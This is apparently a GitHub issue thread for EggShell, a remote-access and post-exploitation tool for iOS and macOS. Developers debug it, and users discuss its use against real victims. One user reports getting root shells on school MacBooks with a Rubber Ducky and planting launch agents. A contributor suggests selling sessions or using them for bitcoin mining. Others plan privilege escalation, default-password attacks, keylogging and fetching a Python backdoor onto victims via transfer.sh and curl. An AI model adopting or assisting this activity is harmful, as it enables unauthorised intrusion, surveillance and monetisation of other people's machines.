[2016-10-24 14:06] ziest12 opened #1 "Eggshell installation error"
First line in red:
Sub-Process /usr/libexec/cydia/cydo returned an error code (1)

Second line in red:
Subprocess post-installation script returned an error exit status 133

[2016-10-25 17:20] neoneggplant commented on #1
This is for installation on iOS, currently pycrypto isn't working on 64 bit devices

[2016-10-25 17:21] #1 closed

[2016-12-13 19:52] MariusSolaat opened #2 "Error when connect"
https://gyazo.com/e63fcc5f6bda9d7b151c671a383c24a2

Any fix?

[2016-12-13 20:06] neoneggplant commented on #2
what device are you trying to connect to, it said device not recognized

[2016-12-13 20:10] MariusSolaat commented on #2
Iphone 6s running 9.3.3 jailbreak

[2016-12-13 20:12] neoneggplant commented on #2
if you run the command "uname -a" on your iPhone 6s what do you get, paste it for me

[2016-12-13 20:16] MariusSolaat commented on #2
I got it to connect now, I had to use a different port for it to let me access. I'm trying this with my friend who has a jb, so it's not over LAN. But both ports I used are open to the IP. So not sure why I got that error

[2016-12-13 20:30] neoneggplant commented on #2
wait, so did you port forward your router to let remote access?

[2016-12-13 20:31] #2 closed

[2016-12-13 20:31] hmksq commented on #2
I could reproduce this on my machine (Ubuntu 16.10) and my friends machine.

[2016-12-13 20:34] hmksq commented on #2
My machine: Linux humaid-LINUX 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Python: 2.7.12+

[code]

[2016-12-13 20:37] MariusSolaat commented on #2
I'm currently on Windows 10. Could that have an effect? And I also get the message "Finished" When installpro, but I still cannot run the commands? I also tried to respring, but it didn't work

[2016-12-13 20:44] AppleManPS3 opened #3 "Issue when using option 1 (Start Server)"
- Using iPad 2 (64GB) with iOS 9.3.3

- I press option one and the program will crash after going though setting up the LPORT

- If the program does not crash, it will freeze and not do anything and has to be closed via Task Manager.

I don't know what this error is but it should be fixed.

[2016-12-13 20:49] MariusSolaat commented on #2
Also, would a auto reconnect feature, or "startup" be possible on an iphone?

[2016-12-13 21:34] hmksq commented on #3
Duplicate of #2

[2016-12-13 22:08] neoneggplant commented on #3
when if freezes, does it say "listening on port xxxx"? And can you elaborate on what happens when it crashes, error messages would be helpful

[2016-12-13 22:10] neoneggplant commented on #2
@MariusSolaat are you running as a virtual machine?

[2016-12-13 22:11] neoneggplant commented on #2
@hmksq are you running in a virtual machine?

[2016-12-13 22:12] neoneggplant commented on #2
@MariusSolaat yeah, with some bash scripting you can easily make it auto connect back, I was going to add a persistence command, expect that within the month

[2016-12-14 00:00] AppleManPS3 commented on #3
It crashes/freezes when "Listening on port xxxx". When it crashes; it crashes. No errors, no message, nothing, the program just disappears.

[2016-12-14 00:39] HepatitisB opened #4 "Error Message"
I've been with this for days, can you help me? I am running this on  VM.

![error](https://cloud.githubusercontent.com/assets/20805377/21165172/c46724cc-c16b-11e6-90b1-3e00308a94a9.PNG)

[2016-12-14 01:50] Shugabuga commented on #4
Alternate title: Error 9 - Bad file descriptor in socket.py

---

Also, have you tried running `pip install socket` as root?

[2016-12-14 01:57] HepatitisB commented on #4
![1](https://cloud.githubusercontent.com/assets/20805377/21166912/c7de0390-c176-11e6-9471-c1f6aee87705.PNG)

[2016-12-14 02:01] Shugabuga commented on #4
Oh yeah, `socket` comes with Python. \**facepalms*\*

It could be an issue with EggShell. Have you tried using a different version (a new one came out not that long ago)?

[2016-12-14 02:05] HepatitisB commented on #4
I deleted old folder (EggShell) and reinstalled but same outcome.

[2016-12-14 02:07] Shugabuga commented on #4
Hmm. Try running it with both `python2` and `python3`. Maybe that makes a difference.

Sorry for vagueness, but I don't have EggShell on my machine, as iOS 10. -_-

[2016-12-14 02:35] neoneggplant commented on #4
only works for python 2.7.x, and eggshell doesn't exploit the safari bug on your device, it is simply an advanced post exploitation payload tool, to run eggshell on the device, you must get it to execute on the device. Getting it running on the device can be done over the command line, ssh, or in code

[2016-12-14 02:36] neoneggplant commented on #3
if you think its freezing, it's not, its listening for the connect back on your iOS device

[2016-12-14 08:08] hmksq commented on #2
@hmksq No I am running a full Ubuntu 16.10 on my computer.
My friend could reproduce this on a Windows computer. (unsure of his version)

[2016-12-14 17:05] AppleManPS3 commented on #3
What does that mean?

[2016-12-14 20:52] Shugabuga commented on #3
@AppleManPS3 It's waiting for your iPhone to connect to EggShell. Did you install it to your device?

[2016-12-14 21:23] MariusSolaat commented on #2
I tried it on my friend's Iphone 6s, the same as before

[2016-12-15 05:09] neoneggplant commented on #2
@hmksq eggshell isn't for exploiting safari, it won't work if your trying to load the server ip in a web browser

[2016-12-15 05:10] neoneggplant commented on #3
@AppleManPS3 @Shugabuga read the documentation on http://lucasjackson.me/index.php/EggShell/

[2016-12-15 05:10] #3 closed

[2016-12-15 05:11] #4 closed

[2016-12-15 22:43] HepatitisB commented on #4
blockquote, div.yahoo_quoted { margin-left: 0 !important; border-left:1px #715FFA solid !important; padding-left:1ex !important; background-color:white !important; } Got a Mac Pro and same result.

Sent from Yahoo Mail for iPhone

On Thursday, December 15, 2016, 12:11 AM, Lucas Jackson <notifications@github.com> wrote:

Closed #4.

—
You are receiving this because you authored the thread.
Reply to

[2017-01-01 06:56] IAmWolfie opened #5 ""device unrecognized""
I think this is caused by any connection that isn't from Safari/an iPhone/iDevice.
Any fix?
`
←[0;36m[*]  ←[0;97mConnecting to 123.125.143.65
←[0;36m[*]  ←[0;97mdevice unrecognized
D573BA5A4EFFC3FB629308

←[0;36m[*]  ←[0;97mWaiting For Target...
←[0;36m[*]  ←[0;97mSending Payload
Traceback (most recent call last):
  File "eggshell.py", line 744, in <module>
    main()
  File "eggshell.py", line 74

[2017-02-11 09:34] MariusSolaat opened #6 "Installpro won't work"
![9b3c2d8a2104fbbe82259cfa6fb0095d](https://cloud.githubusercontent.com/assets/20828176/22852849/a615512a-f045-11e6-9fe6-f9e043c345fd.png)

This has happened to me every time I try to use installpro.

Iphone 6
Ios 10.2
Latest Yalu beta

[2017-02-13 01:12] neoneggplant commented on #6
made some updates to the installpro command, let me know if it works now, what device do you have?

[2017-02-13 22:08] MariusSolaat commented on #6
Newest gets stuck on "Waiting for connection" after using the payload. Both on iPhone 6 and 6S running 10.2 Yalu

[2017-02-13 22:13] MariusSolaat commented on #6
![9b3c2d8a2104fbbe82259cfa6fb0095d](https://cloud.githubusercontent.com/assets/20828176/22905821/14701d0a-f242-11e6-8303-126fcb801ecc.png)

[2017-02-14 01:00] neoneggplant commented on #6
I will look into it, I am going to add some debug logs to get help communicate these types of issues more in depth

[2017-02-14 01:00] neoneggplant commented on #6
are you connecting to your external ip through a port forwarded router?

[2017-02-14 11:57] MariusSolaat commented on #6
Yes I am, and it worked fine with the earlier versions, though installpro has never seemed to work for me. All non pro has though

[2017-02-15 04:26] neoneggplant commented on #6
can you confirm that the payload is being executed after it is sent?

[2017-02-15 04:41] neoneggplant commented on #6
also, is your lhost set to your public ip?

[2017-02-15 11:16] MariusSolaat commented on #6
Where can I check if it's being executed? sorry for asking :P

Also, the Ihost is set to my ruter's IP and the port is forwarded through my local IP. This has worked with all versions of Eggshell except this one.

[2017-02-16 01:55] neoneggplant commented on #6
if you have terminal on the target device, you can run the command top (from cydia) and see if there is a process called ".espl"

[2017-02-16 01:55] neoneggplant commented on #6
do you have the latest version of eggshell? with the updated binaries?

[2017-02-16 08:09] MariusSolaat commented on #6
I am on the newest version yes. And here is a ss of the command

![16805259_10210932334837712_1480684082_o](https://cloud.githubusercontent.com/assets/20828176/23012665/9538bbb8-f427-11e6-86ad-ff5bd638e839.jpg)

[2017-02-16 08:10] MariusSolaat commented on #6
That' after I've run the code and waiting for connection

[2017-02-16 16:35] neoneggplant commented on #6
ok, I was able to recreate your issue, narrowing in on what is happening

[2017-02-16 20:25] MariusSolaat commented on #6
Sounds great! I'll wait, just tell me if you need anuthing else

[2017-02-17 06:58] neoneggplant commented on #6
The problem ended up being the wrong ip in eggshell, for me this caused a connection to be established but since the payload was given wrong ip parameter, it would not connect back to the correct ip, leaving it stuck "waiting for connection". Also, maybe bash is stuck for you? try killall -9 bash

[2017-02-17 17:45] MariusSolaat commented on #6
It wont let me kill it, it just says "No matching processes belonging to you were found"

[2017-02-18 00:23] neoneggplant commented on #6
are you killing it as root?

[2017-02-18 11:11] MariusSolaat commented on #6
I've tried both, same result

[2017-02-18 11:20] MariusSolaat commented on #6
EDIT, when running the script as root on the phone I get connected. And all commands are working fine

[2017-02-19 19:17] MariusSolaat commented on #6
Still nothing without running as root though

[2017-02-20 00:47] neoneggplant commented on #6
no connection at all without root?

[2017-02-20 00:48] neoneggplant commented on #6
ps, installpro requires root

[2017-02-20 07:46] MariusSolaat commented on #6
Ok,. then we know why I never got installpro before, haha. But yeah, there's still no access without root.

[2017-02-21 23:29] nerdtron123 opened #7 "Exploit a victim can use to turn off your server"
A victim could send incorrect data therefore breaking your server and disconnecting all clients.

How to replicate:
1. Create a server.
2. Connect with an OS X client that has no camera.
3. Execute the 'picture' command. You will get a message back about can't get file size.
4. Press enter again, and you'll get an error "we fucked up" and if the program doesn't crash, when you click enter again it

[2017-02-22 00:32] neoneggplant commented on #7
good point, I will add a fix for this

[2017-02-22 01:03] nerdtron123 commented on #7
@neoneggplant see pr #8 😄

[2017-02-22 04:01] nerdtron123 opened #9 "waiting for connection diagnosed and exposed"
if you do my latest master branch on pr #8 it will show the arg stuff and if you take the src/binaries/esplios and put it in ios along with the args.

[2017-02-22 05:12] nerdtron123 commented on #9
i have a fix, will add to pull request

[2017-02-22 06:12] nerdtron123 opened #10 "rip, we need another way in"
if this RAT isn't given root already, we need a way to obtain root.
1. If the default password is still there, root.
2. If the substrate extension is installed, root.

#8 in this pull request the "waiting for connection" was fixed, the issue was writing to directories we had no permission to write to, which meant the rat had to be run as root.

[2017-02-22 06:52] neoneggplant commented on #10
very good, also, getting root on a jailbroken device shouldn't be hard, we could just re use the exploit that got it jailbroken in the first place

[2017-02-22 07:22] nerdtron123 commented on #10
that would make the project bigger + most jailbreaks aren't open source, etc etc.

[2017-02-22 07:23] #7 closed

[2017-02-22 07:24] nerdtron123 commented on #6
no connection at all without root? @neoneggplant we fixed that.

[2017-02-22 13:45] nerdtron123 opened #11 ""exit" throws an error when on multiserver"

[2017-02-22 13:45] #9 closed

[2017-02-22 13:46] nerdtron123 commented on #5
let me try to replicate

[2017-02-22 15:14] neoneggplant commented on #6
@nerdtron123 was it changing the upload directory?

[2017-02-22 15:19] neoneggplant commented on #6
@nerdtron123 the reason in uploaded to /usr/bin is because it would break commands listapps and sbalert if not uploaded there

[2017-02-22 22:04] nerdtron123 opened #12 "commit 745602c6aa239dff8925d9a5b725ab052c442d75 error"
this removes the "oops, couldn't get file size" check which means if someone does the picture "exploit" then it'll freak out because it didn't receive the error message.

[2017-02-22 22:09] nerdtron123 opened #14 "this payload now needs root?"
many functions of the payload can be executed without escalated permissions. All we need for this payload to work is merely a sandbox bypass. now with the new commit, it makes it that it freezes at connection which stops all other connections, with no warning + idk if the 5 second kill if not responding feature works.

[2017-02-22 22:09] nerdtron123 commented on #6
@neoneggplant that breaks non-root connections.

[2017-02-22 22:19] neoneggplant commented on #6
yeah but there currently isn't a work around, we could check if /usr/bin is writable, and fallback to /tmp in the preload @nerdtron123

[2017-02-22 22:30] neoneggplant commented on #6
or chmod the directory to make it writable with mobile? would that be doable?

[2017-02-22 22:43] nerdtron123 opened #16 "make it that we can drop binaries"
we could probably make a little database that has a bunch of tools allowing us to do a command 'root' and it'd automatically determine iOS version + device to find a proper jailbreak tool, so in turn we could get root if not running as root. I understand this is a payload application 🤷‍♂️ but we could expand it

[2017-02-22 22:43] nerdtron123 commented on #6
@neoneggplant look at my pull request

[2017-02-22 23:26] neoneggplant commented on #16
yeah, having privilege escalation is something I want to implement, there are so many we can use

[2017-02-23 13:04] nerdtron123 opened #17 "Running from ios"
http://python.mila432.com Python for iOS 10 :)

[2017-02-23 17:11] neoneggplant commented on #17
does that work with pycrypto on 64 bit devices?

[2017-02-23 17:14] neoneggplant commented on #12
the error message is now generated in the binary, if something went wrong, instead of displaying oops, it displays a more specific error, makes sense? check the espl.m code :)

[2017-02-23 17:15] neoneggplant commented on #12
@nerdtron123 do you have a twitter? Easier communication

[2017-02-23 19:50] nerdtron123 commented on #17
I installed pycrypto but I'm still getting the you need to install pycrypto
error. You have to manually sign the binaries with ldid as shown on site.
If u want me to host eggshell on my repo at
https://apt.enduniverse.com/cydia then hmu

On Thursday, February 23, 2017, Lucas Jackson <notifications@github.com>
wrote:

[2017-02-23 19:50] nerdtron123 commented on #12
@DillanCodez

On Thursday, February 23, 2017, Lucas Jackson <notifications@github.com>
wrote:

[2017-02-23 19:51] nerdtron123 commented on #12
can't get file size means that there was nothing received so nothing's
defined, well I think I need to test it

On Thursday, February 23, 2017, MC Bailey <mcmatters123@gmail.com> wrote:

[2017-02-24 05:27] neoneggplant commented on #17
awesome, let me know if you get it running on 64 bit devices, it is in high demand

[2017-02-24 22:18] #12 closed

[2017-02-24 22:19] nerdtron123 opened #18 ""we fucked up" with the picture exploit doesn't disconnect"

[2017-02-24 23:39] nerdtron123 opened #19 "command parsing"
Create directory named /tmp/lls / on ur local computer then connect to ios device and do lls /tmp/lls / and it will fail.

[2017-02-25 02:47] nerdtron123 opened #20 "unchecked casting"
ints are casted without checking

[2017-02-25 03:34] #19 closed

[2017-02-25 03:39] nerdtron123 opened #22 "exec cmd"
make exec work on macos and ios by doing the following:

$cmd is command

system($cmd+" >/tmp/esplcmdoutput 2>&1")

and then send back file contents of /tmp/esplcmdoutput

[2017-02-25 03:40] nerdtron123 commented on #6
This issue has been resolved please close it

[2017-02-25 03:41] nerdtron123 commented on #14
@neoneggplant add a feature in installpro that allows us to escalate the connection to root, basically it would spawn a new connection with root and disconnect the current one

[2017-02-26 17:24] neoneggplant commented on #18
can you elaborate?

[2017-02-26 17:26] nerdtron123 commented on #18
It'll send "Error: we fucked up, disconnecting" but you have to another
string for it to actually disconnect

On Sun, Feb 26, 2017 at 12:24 PM, Lucas Jackson <notifications@github.com>
wrote:

[2017-02-26 17:30] neoneggplant commented on #18
what do you mean by "picture doesn't disconnect?

[2017-02-26 17:55] nerdtron123 commented on #18
can we share screens on skype?

On Sun, Feb 26, 2017 at 12:30 PM, Lucas Jackson <notifications@github.com>
wrote:

[2017-02-28 08:18] MbrooGit commented on #5
I have the same issue with iphone 4. Url opened with safari

[2017-02-28 09:18] MbrooGit opened #23 "device unrecognized"
Default settings. Iphone 4,4s. Safari. Doesn't work

[2017-02-28 20:39] MbrooGit commented on #23
And one more, can we exploit non-jailbroken devices?

[2017-03-01 20:17] neoneggplant commented on #23
what do you mean? safari?

[2017-03-01 20:18] neoneggplant commented on #23
this isn't supposed to inject using safari

[2017-03-01 20:18] #23 closed

[2017-03-02 23:08] idekwhoIam opened #25 "Most commands dont work"
When I try running commands on a victim that download something, for some reason it doesnt download them..... it will just drop the session...
[code]

[2017-03-03 00:48] neoneggplant commented on #25
@nerdtron123 is this from one of your changes?

[2017-03-03 00:48] neoneggplant commented on #25
@idekwhoIam will push a fix in the next day

[2017-03-03 22:40] thebeastgamer25 opened #26 "Can't connect"
Keep getting "Operation Timed Out" on iOS 10.2

[2017-03-03 22:42] nerdtron123 commented on #25
"data/isight20170302230542.jpeg" data folder doesn't exists

[2017-03-04 03:20] neoneggplant commented on #25
@idekwhoIam try the latest commit

[2017-03-04 03:40] nerdtron123 opened #27 "Exploit"
If the payload that was sent fails then you kill the multiserver.better connection handling is needed

Port 4444, 4445
User connects to 4444
New thread then listen again on 4444
Handshake
Payload sent with connection and we listen on 4445 for them back

4445:
We would handle the payload connections here with also multithreaded approaches

[2017-03-04 03:41] nerdtron123 commented on #26
Ports not open, using wrong ip

[2017-03-04 07:05] #17 closed

[2017-03-04 07:05] #6 closed

[2017-03-04 07:05] #5 closed

[2017-03-04 08:36] mineo210 opened #28 "More commands for MacOS?"
hey, I've been getting a lot of root shells with the rubberducky from my school since they use macbook air. but almost half of the commands I make is "exec" since there is not so "many" ones included. Will there be more commands for macOS in the future? and the "screenshot" command doesn't work even if I have root access, I need to type "exec screencapture -x 1.png"

[2017-03-04 08:42] mineo210 opened #29 "Multiserver issue!?"
When I'm in a session and there's a new session getting connected I get kicked back to the "Multiserver menu" so I need to connect back to the session I was in.. this is pretty annoying if you are downloading something and you get kicked out of it just because there's a new session. Is this an issue or is this made on purpose?!

[2017-03-04 08:49] mineo210 opened #30 "Colors Doesn't Work on Windows."
Hey, I use eggshell on both MacOS and Windows but after you guys "fixed the colors" there was no colors for windows anymore. It's all in white. Please fix!

[2017-03-04 08:58] mineo210 opened #31 "Eggshell + other scrips//metasploit = ??"
This isn't really a issue but how much could this take and what could you do If you combine other scripts into eggshell.. maybe some metasploit features. ?!

[2017-03-04 15:13] nerdtron123 commented on #31
mhm

[2017-03-04 15:14] nerdtron123 commented on #30
"fixed the colors" meant windows was incompatible with ANSI.

[2017-03-04 15:15] nerdtron123 commented on #29
you don't get kicked back, it's just bad shell handling, if you click enter you'll be right back in your session shell.

[2017-03-04 15:16] nerdtron123 commented on #28
If you need more commands, request them.

[2017-03-04 16:50] #27 closed

[2017-03-04 16:50] #11 closed

[2017-03-04 16:51] nerdtron123 opened #33 "woot root"
different approach for root shit
don't check for root in the installpro thing in espl binary
instead have a method to get uid
and check locally

[2017-03-04 16:52] nerdtron123 opened #34 "exploit command"
command 'exploit' will try some good shit, like seeing if su or sudo exists and trying default passwords etc etc

[2017-03-04 16:53] nerdtron123 commented on #16
upload command

[2017-03-04 18:38] mineo210 commented on #28
@nerdtron123 how ??

[2017-03-04 18:46] mineo210 commented on #29
@nerdtron123 do you know any more "tips" I would like to know more about eggshell. And is there anything else than trolling taking screenshots and taking isight pictures ??.. i dont really know what to do now with all of my sessions lmao..

[2017-03-04 20:51] neoneggplant commented on #29
fixed this in the latest commit

[2017-03-04 20:52] neoneggplant commented on #28
I plan to add a lot more + system shell command support

[2017-03-04 20:54] #29 closed

[2017-03-04 22:37] nerdtron123 commented on #28
Close this issue and instead make other issues

[2017-03-04 22:39] nerdtron123 commented on #29
@mineo210 you have a bunch of sessions, you can sell those for money, you can make them be bitcoin mining slaves, etc

[2017-03-04 22:48] nerdtron123 opened #35 "make keylog great again"
make espl hook uikit which I believe will allow it to hook all applications which would fix keylog in apps?

[2017-03-04 22:48] #10 closed

[2017-03-05 08:57] #28 closed

[2017-03-05 08:58] #25 closed

[2017-03-05 08:58] #26 closed

[2017-03-05 09:01] neoneggplant commented on #31
planning on doing something like this soon

[2017-03-05 09:01] #31 closed

[2017-03-05 09:30] mineo210 commented on #35
ay keylogging on macOS would be nice..

[2017-03-06 14:31] mineo210 opened #36 "Session doesn't work!"
***this is what I get !***

[*]  Session 1 opened | root@USER MacBook Air 00.00.00.00
MultiSession> interact 1
[*]  type "help" for commands
root@USER MacBook Air> ls
something went wrong
MultiSession> sessions
[*]  Total Sessions: 1
[Errno 22] Invalid argument

MultiSession>

What is happening ?? it worked before perfect, but now it doesn't for some reason :(

[2017-03-06 15:54] neoneggplant commented on #36
made some bug fixes, let me know if it works now. If the bug fixes aren't related I will fix this asap <img width="346" alt="screen shot 2017-03-06 at 10 53 13 am" src="https://cloud.githubusercontent.com/assets/12518571/23617439/23da5a84-025b-11e7-9b90-24bf06df87bf.png">

[2017-03-06 16:10] mineo210 commented on #36
happens again :(
tho some of the sessions work perfect..

[2017-03-06 16:13] mineo210 commented on #36
I found this today a bit similar what I was thinking but is hard as fuck to get someone to run a python script with root :( https://github.com/manwhoami/Bella
would be cool if you guys could maybe work together or something. :))

[2017-03-06 17:36] mineo210 opened #37 "I don't know what's happening!"
MultiSession> Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self

[2017-03-06 19:37] neoneggplant commented on #37
try latest commit?

[2017-03-06 19:43] neoneggplant commented on #36
heard of bella, havent tried it yet. And is this only showing when you try "sessions"?

[2017-03-06 20:24] mineo210 commented on #36
yeah and  I got Bella working thanks to EggShell, Netcat and transfer.sh I just uploaded the payload to transfer.sh and then later download it via netcat with curl on a random shell and then later chmod it so i can run it with "./"  Bella is a python backdoor so i had to upload the code somehow.. lol bella isnt that good tho.

[2017-03-06 20:25] mineo210 commented on #37
yeah

[2017-03-06 21:15] neoneggplant commented on #36
with eggshell, you can now perform system commands, and do chmod/python somefile.py

[2017-03-07 02:33] #37 closed

[2017-03-07 02:34] #36 closed

[2017-03-08 16:31] mineo210 opened #38 "Shell has a lot of errors."
There is a lot of errors on my sessions.. some commands either doesn't work or when commands are executed there will be a blank space and nothing happens. Netcat is working fine with no errors. I thought first it was some mistake I made on the script for the rubber ducky but It seems it isn't.
Thanks for reading. Hope this gets resolved :)

[2017-03-08 17:44] neoneggplant commented on #38
which commands specifically?

[2017-03-08 17:44] neoneggplant commented on #38
I made some major changes with communication, It may still be a little buggy

[2017-03-08 17:58] mineo210 commented on #38
@neoneggplant mainly "ls" "picture" but others work. sometimes the others will bug a bit like "rm" or "cd" and the connection will be delayed.

[2017-03-08 17:58] neoneggplant commented on #38
which version number are you using?

[2017-03-08 17:59] mineo210 commented on #38
@neoneggplant 2.0.9.9

[2017-03-08 17:59] neoneggplant commented on #38
what happens when you use picture and ls?

[2017-03-08 18:01] neoneggplant commented on #38
<img width="457" alt="screen shot 2017-03-08 at 1 00 37 pm" src="https://cloud.githubusercontent.com/assets/12518571/23716731/44329530-03ff-11e7-9108-91fe196893a8.png">
I can't seem to recreate an error

[2017-03-08 18:01] mineo210 commented on #38
@neoneggplant ill send a picture, it happen to my latest victims

[2017-03-08 18:02] mineo210 commented on #38
it happens on both mac and windows

[2017-03-08 18:03] mineo210 commented on #38
this picture is on a one of the real targets to the ip will be displayed :/

[2017-03-08 18:03] mineo210 commented on #38
https://gyazo.com/91a0d2a571a36b6f0c6912699ac977ce

[2017-03-08 18:04] mineo210 commented on #38
@neoneggplant oh now it says error when I do picture

[2017-03-08 18:05] neoneggplant commented on #38
@mineo210 can you git pull, just to make sure your all caught up with the latest binaries?

[2017-03-08 18:05] mineo210 commented on #38
https://gyazo.com/a8f83ff64da43949df8829cb27361f14

[2017-03-08 18:06] mineo210 commented on #38
@neoneggplant tho netcat works fine with "ls"

[2017-03-08 18:08] mineo210 commented on #38
@neoneggplant https://gyazo.com/f9c61fa4e1a6b2e13bc65b43ac98d :((

[2017-03-08 18:09] neoneggplant commented on #38
hm, try re downloading eggshell completely, maybe something is wrong with your downloaded version

[2017-03-08 18:11] mineo210 commented on #38
@neoneggplant https://gyazo.com/34f667c3a0141a6da3cb36996467a25f  ?!

[2017-03-08 18:13] neoneggplant commented on #38
system shell is still in progress, occasionally that will happen

[2017-03-08 18:14] neoneggplant commented on #38
but ls is causing crashes?

[2017-03-08 18:16] mineo210 commented on #38
@neoneggplant yeah and download doesn't seem to work right now for me and system commands like screencapture

[2017-03-08 18:18] mineo210 commented on #38
ls is the only one the outputs "something went wrong" others now "[*] Error" usally it only comes a blank space and no green text of the victims shell

[2017-03-08 18:39] neoneggplant commented on #38
did you try re downloading eggshell?

[2017-03-08 18:40] neoneggplant commented on #38
<img width="327" alt="screen shot 2017-03-08 at 1 40 16 pm" src="https://cloud.githubusercontent.com/assets/12518571/23718264/cb981be4-0404-11e7-91e8-e7e26c8ba715.png">
it is working for me

[2017-03-08 18:43] mineo210 commented on #38
@neoneggplant if I maybe like you said fully remove it and then reclone it will work

[2017-03-08 18:44] mineo210 commented on #38
@neoneggplant what display do you have? thats some high res lol, does it work if you make the screenshot silent with -x for you?

[2017-03-08 18:52] neoneggplant commented on #38
<img width="496" alt="screen shot 2017-03-08 at 1 51 22 pm" src="https://cloud.githubusercontent.com/assets/12518571/23718660/589199e8-0406-11e7-8faf-7fcda6dfa73c.png">
yup, its working, and yeah, try recloning

[2017-03-08 18:53] mineo210 commented on #38
@neoneggplant alright

[2017-03-08 18:56] mineo210 commented on #38
@neoneggplant I recloned now and "ls" still doesn't work :((

[2017-03-08 18:59] mineo210 commented on #38
@neoneggplant Now I actually think there's something wrong with the "Payload" cause I think the script didn't fully complete when I was inside of single user mode it just shut down after like 10 seconds.. usually takes 30 secs with the rubberducky

[2017-03-08 19:00] mineo210 commented on #38
@neoneggplant do you think it's a better idea if I remove the content it installed via single user mode and add the persistence command instead?

[2017-03-08 19:13] neoneggplant commented on #38
are the same commands not working still?

[2017-03-08 19:13] neoneggplant commented on #38
and what do you mean by removing the content via single user mode?

[2017-03-08 19:16] neoneggplant commented on #38
I am going to make ls use the system ls instead

[2017-03-08 19:17] mineo210 commented on #38
the rubberducky installed a launchagent inside of single user mode when you do "cmd+s" when you restart the mac.. what if thats the issue

[2017-03-08 19:18] neoneggplant commented on #38
maybe, if it cant get the current working directory, that may be what is causing ls to fail

[2017-03-08 19:18] mineo210 commented on #38
the same commands make the same as before.. tho some of my victim has no errors

[2017-03-08 19:18] mineo210 commented on #38
tho ls work sometimes when you do cd to something so yeah probably

[2017-03-08 19:26] Viashen84 opened #39 "Device Unrecognized"
I get the below error from an iPhone 6S Plus via Safari trying to connect back to my mac

![unrecognized device](https://cloud.githubusercontent.com/assets/26285041/23719893/a9acfd38-0445-11e7-91c9-62a6d35907af.jpeg)

[2017-03-08 19:44] neoneggplant commented on #38
when you get a connection, if you run pwd first, what does it say?

[2017-03-08 19:45] mineo210 commented on #38
@neoneggplant it says "/"

[2017-03-08 19:45] mineo210 commented on #38
because I'm root

[2017-03-08 19:55] neoneggplant commented on #38
try to obtain the crash logs of espl if you can on the target

[2017-03-08 19:57] mineo210 commented on #38
wait what?

[2017-03-08 19:57] mineo210 commented on #38
what crash logs?

[2017-03-08 20:02] neoneggplant commented on #38
~/Library/Logs/DiagnosticReports/ and they should start with espl

[2017-03-08 20:03] neoneggplant commented on #38
I found the cause of screenshot to crash, in the log it says Application Specific Information:
*** Terminating app due to uncaught exception 'NSInternalInconsistencyException', reason: 'Invalid parameter not satisfying: cgImage != NULL'
terminating with uncaught exception of type NSException
abort() called

[2017-03-08 20:06] mineo210 commented on #38
i was able to find the espl crash logs.. should I try to download them?

[2017-03-08 20:07] mineo210 commented on #38
it worked download the latest one

[2017-03-08 20:09] mineo210 commented on #38
@neoneggplant what should i look into in the log?

[2017-03-08 20:10] mineo210 commented on #38
@neoneggplant do you know what it means? the one you found about the screenshot ??

[2017-03-08 20:22] neoneggplant commented on #38
did you download the recent one?

[2017-03-08 20:22] neoneggplant commented on #38
I made a change where it crashed for screenshot, tested and screenshot works now

[2017-03-08 20:22] neoneggplant commented on #38
can you try?

[2017-03-08 20:25] mineo210 commented on #38
ok

[2017-03-08 20:29] mineo210 commented on #38
fuck it doesnt work I get this.. i typed screenshot wrong becasue im lazy lol https://gyazo.com/16bc6686598e24b901a63f744a9f0c6e

[2017-03-08 20:45] neoneggplant commented on #38
did you get the latest commit with the updated binary?

[2017-03-08 20:45] neoneggplant commented on #38
also, I am about to push another update, all bug fixes, if the command length is 14, the padding would be messed up

[2017-03-08 20:47] mineo210 commented on #38
@neoneggplant Awesome! I did git pull isn't that enough ??

[2017-03-08 20:48] mineo210 commented on #38
@neoneggplant btw I'm really thankful you're helping me :))

[2017-03-08 20:54] mineo210 commented on #39
are you connecting to like this on the phone?
safari > http://172.16.2.25:4444/

how do you do it explain ?!

[2017-03-08 20:56] mineo210 commented on #38
@neoneggplant i got the latest log what now?!

[2017-03-08 20:58] neoneggplant commented on #38
can you past the log so I can see the uncaught exception message?

[2017-03-08 21:01] mineo210 commented on #38
the espl?

[2017-03-08 21:33] neoneggplant commented on #38
yes

[2017-03-08 21:44] neoneggplant commented on #39
lol so many people try to connect in safari, probably from that everything apple pro video, you need to execute it in bash

[2017-03-08 21:44] #39 closed

[2017-03-08 21:45] neoneggplant commented on #38
just pushed a fix for rm on macOS

[2017-03-08 21:46] neoneggplant commented on #38
I am going to keep ls in espl, is it still broken after the padding bugs I fixed?

[2017-03-08 21:49] mineo210 commented on #38
oh ill send the whole crash log its pretty long?!.. im gonna update now :))

[2017-03-08 21:50] neoneggplant commented on #38
yeah just upload the file

[2017-03-08 21:52] mineo210 commented on #38
[espl_2017-03-08-204548_kevins-MacBook-Air-2.txt](https://github.com/neoneggplant/EggShell/files/829069/espl_2017-03-08-204548_kevins-MacBook-Air-2.txt)

[2017-03-08 21:53] mineo210 commented on #38
open it on sublime its way easier to read

[2017-03-08 21:54] mineo210 commented on #38
ill try to test this tomorrow no clients are on right now :/

[2017-03-08 22:16] neoneggplant commented on #38
alright

[2017-03-09 20:36] mineo210 commented on #38
@neoneggplant still doesn't work that good but here's the weird thing everything works fine until i first "cd" to something.. but if I do "cd .." back to where i was more than half of the commands will crash the shell :/

[2017-03-09 20:44] neoneggplant commented on #38
hmmm, weird, try to isolate the error and get as much info as you can

[2017-03-09 20:45] neoneggplant commented on #38
find the cd command that can be tested to get the same crash each time and which specific commands would crash the shell

[2017-03-09 20:45] neoneggplant commented on #38
is it only cd that causes it?

[2017-03-10 06:31] mineo210 commented on #38
@neoneggplant oh sorry I meant that the only command that works is "cd" at first and if you "cd" to something all of the commands will work but if you "cd .." back it will be the same as before that 70 % of the commands will crash or either just dosent work

[2017-03-10 18:31] neoneggplant commented on #38
do you have screenshots of this process?

[2017-03-10 21:33] mineo210 commented on #38
@neoneggplant I can make a gif

[2017-03-10 22:10] neoneggplant commented on #38
yeah thats fine

[2017-03-11 12:44] mineo210 commented on #38
1 example https://gyazo.com/b5cf0aa287974b58f626fa21eae63990

[2017-03-12 23:14] yannip1234 opened #40 "Getting error when client connects to server."
